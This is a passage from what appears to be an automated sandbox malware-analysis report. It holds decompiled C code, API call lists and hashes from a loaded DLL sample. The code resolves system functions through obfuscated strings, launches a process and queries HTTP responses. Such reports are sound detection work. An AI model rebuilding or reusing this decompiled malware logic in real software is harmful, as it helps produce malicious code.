                                					StrTrimA(_t148, 0xd4c28c);
                                					_push(_t148);
                                					_t94 = E00D4A677();
                                					_v16 = _t94;
                                					if(_t94 == 0) {
                                						L23:
                                						HeapFree( *0xd4d238, _t152, _t148);
                                						goto L24;
                                					}
                                					_t153 = __imp__;
                                					 *_t153(_t148, _a4);
                                					 *_t153(_v8, _v20);
                                					_t154 = __imp__;
                                					 *_t154(_v8, _v16);
                                					_t100 = E00D47B3B( *_t154(_v8, _t148), _v8);
                                					_a4 = _t100;
                                					if(_t100 == 0) {
                                						_v12 = 8;
                                						L21:
                                						E00D45433();
                                						L22:
                                						HeapFree( *0xd4d238, 0, _v16);
                                						_t152 = 0;
                                						goto L23;
                                					}
                                					_t104 = E00D49F33(_t133, 0xffffffffffffffff, _t148,  &_v24);
                                					_v12 = _t104;
                                					if(_t104 == 0) {
                                						_t157 = _v24;
                                						_v12 = E00D4137B(_t157, _a4, _a8, _a12);
                                						_t112 =  *((intOrPtr*)(_t157 + 8));
                                						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
                                						_t114 =  *((intOrPtr*)(_t157 + 8));
                                						 *((intOrPtr*)( *_t114 + 8))(_t114);
                                						_t116 =  *((intOrPtr*)(_t157 + 4));
                                						 *((intOrPtr*)( *_t116 + 8))(_t116);
                                						_t118 =  *_t157;
                                						 *((intOrPtr*)( *_t118 + 8))(_t118);
                                						E00D48B22(_t157);
                                					}
                                					if(_v12 != 0x10d2) {
                                						L16:
                                						if(_v12 == 0) {
                                							_t106 = _a8;
                                							if(_t106 != 0) {
                                								_t149 =  *_t106;
                                								_t155 =  *_a12;
                                								wcstombs( *_t106,  *_t106,  *_a12);
                                								_t109 = E00D47953(_t149, _t149, _t155 >> 1);
                                								_t148 = _v28;
                                								 *_a12 = _t109;
                                							}
                                						}
                                						goto L19;
                                					} else {
                                						if(_a8 != 0) {
                                							L19:
                                							E00D48B22(_a4);
                                							if(_v12 == 0 || _v12 == 0x10d2) {
                                								goto L22;
                                							} else {
                                								goto L21;
                                							}
                                						}
                                						_v12 = _v12 & 0x00000000;
                                						goto L16;
                                					}
                                				}
                                			}

                                APIs
                                • GetTickCount.KERNEL32 ref: 00D45464
                                • wsprintfA.USER32 ref: 00D454B4
                                • wsprintfA.USER32 ref: 00D454D1
                                • wsprintfA.USER32 ref: 00D454FD
                                • HeapFree.KERNEL32(00000000,?), ref: 00D4550F
                                • wsprintfA.USER32 ref: 00D45530
                                • HeapFree.KERNEL32(00000000,?), ref: 00D45540
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00D4556E
                                • GetTickCount.KERNEL32 ref: 00D4557F
                                • RtlEnterCriticalSection.NTDLL(03289570), ref: 00D45593
                                • RtlLeaveCriticalSection.NTDLL(03289570), ref: 00D455B1
                                  • Part of subcall function 00D47B8D: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,00D49DA0,?,032895B0), ref: 00D47BB8
                                  • Part of subcall function 00D47B8D: lstrlen.KERNEL32(?,?,?,00D49DA0,?,032895B0), ref: 00D47BC0
                                  • Part of subcall function 00D47B8D: strcpy.NTDLL ref: 00D47BD7
                                  • Part of subcall function 00D47B8D: lstrcat.KERNEL32(00000000,?), ref: 00D47BE2
                                  • Part of subcall function 00D47B8D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00D49DA0,?,032895B0), ref: 00D47BFF
                                • StrTrimA.SHLWAPI(00000000,00D4C28C,?,032895B0), ref: 00D455E8
                                  • Part of subcall function 00D4A677: lstrlen.KERNEL32(03289B08,00000000,00000000,7691C740,00D49DCB,00000000), ref: 00D4A687
                                  • Part of subcall function 00D4A677: lstrlen.KERNEL32(?), ref: 00D4A68F
                                  • Part of subcall function 00D4A677: lstrcpy.KERNEL32(00000000,03289B08), ref: 00D4A6A3
                                  • Part of subcall function 00D4A677: lstrcat.KERNEL32(00000000,?), ref: 00D4A6AE
                                • lstrcpy.KERNEL32(00000000,?), ref: 00D45609
                                • lstrcpy.KERNEL32(?,?), ref: 00D45611
                                • lstrcat.KERNEL32(?,?), ref: 00D4561F
                                • lstrcat.KERNEL32(?,00000000), ref: 00D45625
                                  • Part of subcall function 00D47B3B: lstrlen.KERNEL32(?,00000000,03289D18,00000000,00D45142,03289F3B,?,?,?,?,?,69B25F44,00000005,00D4D00C), ref: 00D47B42
                                  • Part of subcall function 00D47B3B: mbstowcs.NTDLL ref: 00D47B6B
                                  • Part of subcall function 00D47B3B: memset.NTDLL ref: 00D47B7D
                                • wcstombs.NTDLL ref: 00D456B6
                                  • Part of subcall function 00D4137B: SysAllocString.OLEAUT32(?), ref: 00D413B6
                                  • Part of subcall function 00D48B22: RtlFreeHeap.NTDLL(00000000,00000000,00D4131A,00000000,?,?,00000000), ref: 00D48B2E
                                • HeapFree.KERNEL32(00000000,?,?), ref: 00D456F7
                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00D45703
                                • HeapFree.KERNEL32(00000000,?,?,032895B0), ref: 00D4570F
                                • HeapFree.KERNEL32(00000000,?), ref: 00D4571B
                                • HeapFree.KERNEL32(00000000,?), ref: 00D45727
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                • String ID: Ut
                                • API String ID: 3748877296-8415677
                                • Opcode ID: 6e6fc63c86c9a253b411ff9e0971831f88652be029ec40a7366e13f96d3755d6
                                • Instruction ID: a2c523b24e396cf74130f064c3745938554b551a94c35e97f1eaf6e270f8be2d
                                • Opcode Fuzzy Hash: 6e6fc63c86c9a253b411ff9e0971831f88652be029ec40a7366e13f96d3755d6
                                • Instruction Fuzzy Hash: 42912675900218EFCB119FA8EC88AAEBBBAEF09350F154464F404EB261DB71D951DB74
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 73%
                                			E00D43485(void* __eax, void* __ecx) {
                                				long _v8;
                                				char _v12;
                                				void* _v16;
                                				void* _v28;
                                				long _v32;
                                				void _v104;
                                				char _v108;
                                				long _t36;
                                				intOrPtr _t40;
                                				intOrPtr _t47;
                                				intOrPtr _t50;
                                				void* _t58;
                                				void* _t68;
                                				intOrPtr* _t70;
                                				intOrPtr* _t71;
                                
                                				_t1 = __eax + 0x14; // 0x74183966
                                				_t69 =  *_t1;
                                				_t36 = E00D44944(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                                				_v8 = _t36;
                                				if(_t36 != 0) {
                                					L12:
                                					return _v8;
                                				}
                                				E00D4A789( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                                				_t40 = _v12(_v12);
                                				_v8 = _t40;
                                				if(_t40 == 0 && ( *0xd4d260 & 0x00000001) != 0) {
                                					_v32 = 0;
                                					asm("stosd");
                                					asm("stosd");
                                					asm("stosd");
                                					_v108 = 0;
                                					memset( &_v104, 0, 0x40);
                                					_t47 =  *0xd4d2a8; // 0x253a5a8
                                					_t18 = _t47 + 0xd4e3e6; // 0x73797325
                                					_t68 = E00D47912(_t18);
                                					if(_t68 == 0) {
                                						_v8 = 8;
                                					} else {
                                						_t50 =  *0xd4d2a8; // 0x253a5a8
                                						_t19 = _t50 + 0xd4e747; // 0x3288cef
                                						_t20 = _t50 + 0xd4e0af; // 0x4e52454b
                                						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                						if(_t71 == 0) {
                                							_v8 = 0x7f;
                                						} else {
                                							_v108 = 0x44;
                                							E00D43179();
                                							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                							_push(1);
                                							E00D43179();
                                							if(_t58 == 0) {
                                								_v8 = GetLastError();
                                							} else {
                                								CloseHandle(_v28);
                                								CloseHandle(_v32);
                                							}
                                						}
                                						HeapFree( *0xd4d238, 0, _t68);
                                					}
                                				}
                                				_t70 = _v16;
                                				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                                				E00D48B22(_t70);
                                				goto L12;
                                			}

                                APIs
                                  • Part of subcall function 00D44944: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00D434A1,?,00000001,?,?,00000000,00000000), ref: 00D44969
                                  • Part of subcall function 00D44944: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00D4498B
                                  • Part of subcall function 00D44944: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00D449A1
                                  • Part of subcall function 00D44944: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00D449B7
                                  • Part of subcall function 00D44944: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00D449CD
                                  • Part of subcall function 00D44944: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00D449E3
                                • memset.NTDLL ref: 00D434EF
                                  • Part of subcall function 00D47912: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,00D43508,73797325), ref: 00D47923
                                  • Part of subcall function 00D47912: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00D4793D
                                • GetModuleHandleA.KERNEL32(4E52454B,03288CEF,73797325), ref: 00D43525
                                • GetProcAddress.KERNEL32(00000000), ref: 00D4352C
                                • HeapFree.KERNEL32(00000000,00000000), ref: 00D43594
                                  • Part of subcall function 00D43179: GetProcAddress.KERNEL32(36776F57,00D48BDC), ref: 00D43194
                                • CloseHandle.KERNEL32(00000000,00000001), ref: 00D43571
                                • CloseHandle.KERNEL32(?), ref: 00D43576
                                • GetLastError.KERNEL32(00000001), ref: 00D4357A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                • String ID: Ut
                                • API String ID: 3075724336-8415677
                                • Opcode ID: 7ad159ec244c4caa0dd24953d00eeb18c1f3d0fb9d0aca2be112f25ccf5d6038
                                • Instruction ID: 3670e53fcf48ab0d34a2eb5262119bc8ab906783a797ca2c3f80ad487a571c04
                                • Opcode Fuzzy Hash: 7ad159ec244c4caa0dd24953d00eeb18c1f3d0fb9d0aca2be112f25ccf5d6038
                                • Instruction Fuzzy Hash: AA311FB6900208BFDB10AFA8DC89D9EBBBCEF08354F144569E545E7221D7719E48DB70
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 27%
                                			E00D48F85(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                				intOrPtr _v8;
                                				intOrPtr _v12;
                                				long _v16;
                                				intOrPtr _v20;
                                				signed int _v24;
                                				void* __esi;
                                				long _t43;
                                				intOrPtr _t44;
                                				intOrPtr _t46;
                                				void* _t48;
                                				void* _t49;
                                				void* _t50;
                                				intOrPtr _t54;
                                				intOrPtr _t57;
                                				void* _t58;
                                				void* _t59;
                                				void* _t60;
                                				intOrPtr _t66;
                                				void* _t71;
                                				void* _t74;
                                				intOrPtr _t75;
                                				void* _t77;
                                				intOrPtr _t79;
                                				intOrPtr* _t80;
                                				intOrPtr _t91;
                                
                                				_t79 =  *0xd4d33c; // 0x3289bc0
                                				_v24 = 8;
                                				_t43 = GetTickCount();
                                				_push(5);
                                				_t74 = 0xa;
                                				_v16 = _t43;
                                				_t44 = E00D49B1B(_t74,  &_v16);
                                				_v8 = _t44;
                                				if(_t44 == 0) {
                                					_v8 = 0xd4c18c;
                                				}
                                				_t46 = E00D47F8B(_t79);
                                				_v12 = _t46;
                                				if(_t46 != 0) {
                                					_t80 = __imp__;
                                					_t48 =  *_t80(_v8, _t71);
                                					_t49 =  *_t80(_v12);
                                					_t50 =  *_t80(_a4);
                                					_t54 = E00D41525(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                                					_v20 = _t54;
                                					if(_t54 != 0) {
                                						_t75 =  *0xd4d2a8; // 0x253a5a8
                                						_t16 = _t75 + 0xd4eb08; // 0x530025
                                						 *0xd4d118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
                                						_push(4);
                                						_t77 = 5;
                                						_t57 = E00D49B1B(_t77,  &_v16);
                                						_v8 = _t57;
                                						if(_t57 == 0) {
                                							_v8 = 0xd4c190;
                                						}
                                						_t58 =  *_t80(_v8);
                                						_t59 =  *_t80(_v12);
                                						_t60 =  *_t80(_a4);
                                						_t91 = E00D41525(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                                						if(_t91 == 0) {
                                							E00D48B22(_v20);
                                						} else {
                                							_t66 =  *0xd4d2a8; // 0x253a5a8
                                							_t31 = _t66 + 0xd4ec28; // 0x73006d
                                							 *0xd4d118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
                                							 *_a16 = _v20;
                                							_v24 = _v24 & 0x00000000;
                                							 *_a20 = _t91;
                                						}
                                					}
                                					E00D48B22(_v12);
                                				}
                                				return _v24;
                                			}

                                APIs
                                • GetTickCount.KERNEL32 ref: 00D48F9A
                                • lstrlen.KERNEL32(?,80000002,00000005), ref: 00D48FDA
                                • lstrlen.KERNEL32(00000000), ref: 00D48FE3
                                • lstrlen.KERNEL32(00000000), ref: 00D48FEA
                                • lstrlenW.KERNEL32(80000002), ref: 00D48FF7
                                • lstrlen.KERNEL32(?,00000004), ref: 00D49057
                                • lstrlen.KERNEL32(?), ref: 00D49060
                                • lstrlen.KERNEL32(?), ref: 00D49067
                                • lstrlenW.KERNEL32(?), ref: 00D4906E
                                  • Part of subcall function 00D48B22: RtlFreeHeap.NTDLL(00000000,00000000,00D4131A,00000000,?,?,00000000), ref: 00D48B2E
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: lstrlen$CountFreeHeapTick
                                • String ID:
                                • API String ID: 2535036572-0
                                • Opcode ID: af918b54a522d325ca1caec884df5ea278f13ae27d51631afa2664f81d065419
                                • Instruction ID: 2aa29ccedb6b51264cf2746b02bd76064d17836c5bc896bf9395729139709fa1
                                • Opcode Fuzzy Hash: af918b54a522d325ca1caec884df5ea278f13ae27d51631afa2664f81d065419
                                • Instruction Fuzzy Hash: 9E413576900219FBCF22AFA4CC499DEBBB5EF48354F054050F904A7221DB36DA65EBB0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E00D457DD(void* __ecx, void* __esi) {
                                				long _v8;
                                				long _v12;
                                				long _v16;
                                				long _v20;
                                				long _t34;
                                				long _t39;
                                				long _t42;
                                				long _t56;
                                				void* _t58;
                                				void* _t59;
                                				void* _t61;
                                
                                				_t61 = __esi;
                                				_t59 = __ecx;
                                				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                				do {
                                					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                                					_v20 = _t34;
                                					if(_t34 != 0) {
                                						L3:
                                						_v8 = 4;
                                						_v16 = 0;
                                						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
                                							_t39 = GetLastError();
                                							_v12 = _t39;
                                							if(_v20 == 0 || _t39 != 0x2ef3) {
                                								L15:
                                								return _v12;
                                							} else {
                                								goto L11;
                                							}
                                						}
                                						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
                                							goto L11;
                                						} else {
                                							_v16 = 0;
                                							_v8 = 0;
                                							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
                                							_t58 = E00D41525(_v8 + 1);
                                							if(_t58 == 0) {
                                								_v12 = 8;
                                							} else {
                                								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
                                									E00D48B22(_t58);
                                									_v12 = GetLastError();
                                								} else {
                                									 *((char*)(_t58 + _v8)) = 0;
                                									 *(_t61 + 0xc) = _t58;
                                								}
                                							}
                                							goto L15;
                                						}
                                					}
                                					SetEvent( *(_t61 + 0x1c));
                                					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                					_v12 = _t56;
                                					if(_t56 != 0) {
                                						goto L15;
                                					}
                                					goto L3;
                                					L11:
                                					_t42 = E00D429C0( *(_t61 + 0x1c), _t59, 0xea60);
                                					_v12 = _t42;
                                				} while (_t42 == 0);
                                				goto L15;
                                			}

                                APIs
                                • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74E481D0), ref: 00D457F4
                                • SetEvent.KERNEL32(?), ref: 00D45804
                                • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 00D45836
                                • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 00D4585B
                                • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 00D4587B
                                • GetLastError.KERNEL32 ref: 00D4588D
                                  • Part of subcall function 00D429C0: WaitForMultipleObjects.KERNEL32(00000002,00D4A923,00000000,00D4A923,?,?,?,00D4A923,0000EA60), ref: 00D429DB
                                  • Part of subcall function 00D48B22: RtlFreeHeap.NTDLL(00000000,00000000,00D4131A,00000000,?,?,00000000), ref: 00D48B2E
                                • GetLastError.KERNEL32(00000000), ref: 00D458C2
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                • String ID:
                                • API String ID: 3369646462-0
                                • Opcode ID: 661c28472e4cf4c91169dd7e93d0a63d951bb42860c8d75b0cc84b91cb6572c1
                                • Instruction ID: fc8f8fb783425a56a38610049dacaf2f762b271ba608f6b665ded2dd9b1991a5
                                • Opcode Fuzzy Hash: 661c28472e4cf4c91169dd7e93d0a63d951bb42860c8d75b0cc84b91cb6572c1
                                • Instruction Fuzzy Hash: F2314EB5D00748EFDB20DFA5D88499EB7F8EB08300F14496AE542E2256DB709A489F70
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 63%
                                			E00D47B8D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                				intOrPtr _v8;
                                				intOrPtr _t9;
                                				intOrPtr _t13;
                                				char* _t28;
                                				void* _t33;
                                				void* _t34;
                                				char* _t36;
                                				intOrPtr* _t40;
                                				char* _t41;
                                				char* _t42;
                                				char* _t43;
                                
                                				_t34 = __edx;
                                				_push(__ecx);
                                				_t9 =  *0xd4d2a8; // 0x253a5a8
                                				_t1 = _t9 + 0xd4e62c; // 0x253d7325
                                				_t36 = 0;
                                				_t28 = E00D4A055(__ecx, _t1);
                                				if(_t28 != 0) {
                                					_t40 = __imp__;
                                					_t13 =  *_t40(_t28);
                                					_v8 = _t13;
                                					_t41 = E00D41525(_v8 +  *_t40(_a4) + 1);
                                					if(_t41 != 0) {
                                						strcpy(_t41, _t28);
                                						_pop(_t33);
                                						__imp__(_t41, _a4);
                                						_t36 = E00D41188(_t34, _t41, _a8);
                                						E00D48B22(_t41);
                                						_t42 = E00D4976F(StrTrimA(_t36, "="), _t36);
                                						if(_t42 != 0) {
                                							E00D48B22(_t36);
                                							_t36 = _t42;
                                						}
                                						_t43 = E00D4A41C(_t36, _t33);
                                						if(_t43 != 0) {
                                							E00D48B22(_t36);
                                							_t36 = _t43;
                                						}
                                					}
                                					E00D48B22(_t28);
                                				}
                                				return _t36;
                                			}

                                APIs
                                  • Part of subcall function 00D4A055: lstrlen.KERNEL32(00000000,00000000,00000000,7691C740,?,?,?,00D47BA7,253D7325,00000000,00000000,7691C740,?,?,00D49DA0,?), ref: 00D4A0BC
                                  • Part of subcall function 00D4A055: sprintf.NTDLL ref: 00D4A0DD
                                • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,00D49DA0,?,032895B0), ref: 00D47BB8
                                • lstrlen.KERNEL32(?,?,?,00D49DA0,?,032895B0), ref: 00D47BC0
                                  • Part of subcall function 00D41525: RtlAllocateHeap.NTDLL(00000000,00000000,00D41278), ref: 00D41531
                                • strcpy.NTDLL ref: 00D47BD7
                                • lstrcat.KERNEL32(00000000,?), ref: 00D47BE2
                                  • Part of subcall function 00D41188: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,00D47BF1,00000000,?,?,?,00D49DA0,?,032895B0), ref: 00D4119F
                                  • Part of subcall function 00D48B22: RtlFreeHeap.NTDLL(00000000,00000000,00D4131A,00000000,?,?,00000000), ref: 00D48B2E
                                • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00D49DA0,?,032895B0), ref: 00D47BFF
                                  • Part of subcall function 00D4976F: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,00D47C0B,00000000,?,?,00D49DA0,?,032895B0), ref: 00D49779
                                  • Part of subcall function 00D4976F: _snprintf.NTDLL ref: 00D497D7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                • String ID: =
                                • API String ID: 2864389247-1428090586
                                • Opcode ID: 5c4c79af1e0ce5c9d48cad1a1eb4ea5726b5a02cc59d98dd4263819859cf2f12
                                • Instruction ID: df8201708c0e2006bc181ef11ff94360dde37da6653e423b8ad42eab6d269650
                                • Opcode Fuzzy Hash: 5c4c79af1e0ce5c9d48cad1a1eb4ea5726b5a02cc59d98dd4263819859cf2f12
                                • Instruction Fuzzy Hash: 5811707B9012257B47227FB49C89CAFB6ADDF897A03190515F504E7202DF74DD0297B1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SysAllocString.OLEAUT32(00000000), ref: 00D494A4
                                • SysAllocString.OLEAUT32(0070006F), ref: 00D494B8
                                • SysAllocString.OLEAUT32(00000000), ref: 00D494CA
                                • SysFreeString.OLEAUT32(00000000), ref: 00D49532
                                • SysFreeString.OLEAUT32(00000000), ref: 00D49541
                                • SysFreeString.OLEAUT32(00000000), ref: 00D4954C
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: String$AllocFree
                                • String ID:
                                • API String ID: 344208780-0
                                • Opcode ID: 1fd6528f18204e2af97da5ad401bb9d9ea376bbbb7e4e5e1755e6b74c1d0a8de
                                • Instruction ID: d1b6e509bde65bbf83940695ad6c99662a09c4580a689b7794134e9e9c069685
                                • Opcode Fuzzy Hash: 1fd6528f18204e2af97da5ad401bb9d9ea376bbbb7e4e5e1755e6b74c1d0a8de
                                • Instruction Fuzzy Hash: 76414F36900609AFDB02DFBDD854AAFB7BAEF49310F144466F914EB220DA71DD05CBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E00D44944(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                				intOrPtr _v8;
                                				intOrPtr _t23;
                                				intOrPtr _t26;
                                				_Unknown_base(*)()* _t28;
                                				intOrPtr _t30;
                                				_Unknown_base(*)()* _t32;
                                				intOrPtr _t33;
                                				_Unknown_base(*)()* _t35;
                                				intOrPtr _t36;
                                				_Unknown_base(*)()* _t38;
                                				intOrPtr _t39;
                                				_Unknown_base(*)()* _t41;
                                				intOrPtr _t44;
                                				struct HINSTANCE__* _t48;
                                				intOrPtr _t54;
                                
                                				_t54 = E00D41525(0x20);
                                				if(_t54 == 0) {
                                					_v8 = 8;
                                				} else {
                                					_t23 =  *0xd4d2a8; // 0x253a5a8
                                					_t1 = _t23 + 0xd4e11a; // 0x4c44544e
                                					_t48 = GetModuleHandleA(_t1);
                                					_t26 =  *0xd4d2a8; // 0x253a5a8
                                					_t2 = _t26 + 0xd4e769; // 0x7243775a
                                					_v8 = 0x7f;
                                					_t28 = GetProcAddress(_t48, _t2);
                                					 *(_t54 + 0xc) = _t28;
                                					if(_t28 == 0) {
                                						L8:
                                						E00D48B22(_t54);
                                					} else {
                                						_t30 =  *0xd4d2a8; // 0x253a5a8
                                						_t5 = _t30 + 0xd4e756; // 0x614d775a
                                						_t32 = GetProcAddress(_t48, _t5);
                                						 *(_t54 + 0x10) = _t32;
                                						if(_t32 == 0) {
                                							goto L8;
                                						} else {
                                							_t33 =  *0xd4d2a8; // 0x253a5a8
                                							_t7 = _t33 + 0xd4e40b; // 0x6e55775a
                                							_t35 = GetProcAddress(_t48, _t7);
                                							 *(_t54 + 0x14) = _t35;
                                							if(_t35 == 0) {
                                								goto L8;
                                							} else {
                                								_t36 =  *0xd4d2a8; // 0x253a5a8
                                								_t9 = _t36 + 0xd4e4d2; // 0x4e6c7452
                                								_t38 = GetProcAddress(_t48, _t9);
                                								 *(_t54 + 0x18) = _t38;
                                								if(_t38 == 0) {
                                									goto L8;
                                								} else {
                                									_t39 =  *0xd4d2a8; // 0x253a5a8
                                									_t11 = _t39 + 0xd4e779; // 0x6c43775a
                                									_t41 = GetProcAddress(_t48, _t11);
                                									 *(_t54 + 0x1c) = _t41;
                                									if(_t41 == 0) {
                                										goto L8;
                                									} else {
                                										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                										_t44 = E00D45CD1(_t54, _a8);
                                										_v8 = _t44;
                                										if(_t44 != 0) {
                                											goto L8;
                                										} else {
                                											 *_a12 = _t54;
                                										}
                                									}
                                								}
                                							}
                                						}
                                					}
                                				}
                                				return _v8;
                                			}

                                0x00d44953
                                0x00d44957
                                0x00d44a19
                                0x00d4495d
                                0x00d4495d
                                0x00d44962
                                0x00d44975
                                0x00d44977
                                0x00d4497c
                                0x00d44984
                                0x00d4498b
                                0x00d4498d
                                0x00d44992
                                0x00d44a11
                                0x00d44a12
                                0x00d44994
                                0x00d44994
                                0x00d44999
                                0x00d449a1
                                0x00d449a3
                                0x00d449a8
                                0x00000000
                                0x00d449aa
                                0x00d449aa
                                0x00d449af
                                0x00d449b7
                                0x00d449b9
                                0x00d449be
                                0x00000000
                                0x00d449c0
                                0x00d449c0
                                0x00d449c5
                                0x00d449cd
                                0x00d449cf
                                0x00d449d4
                                0x00000000
                                0x00d449d6
                                0x00d449d6
                                0x00d449db
                                0x00d449e3
                                0x00d449e5
                                0x00d449ea
                                0x00000000
                                0x00d449ec
                                0x00d449f2
                                0x00d449f7
                                0x00d449fe
                                0x00d44a03
                                0x00d44a08
                                0x00000000
                                0x00d44a0a
                                0x00d44a0d
                                0x00d44a0d
                                0x00d44a08
                                0x00d449ea
                                0x00d449d4
                                0x00d449be
                                0x00d449a8
                                0x00d44992
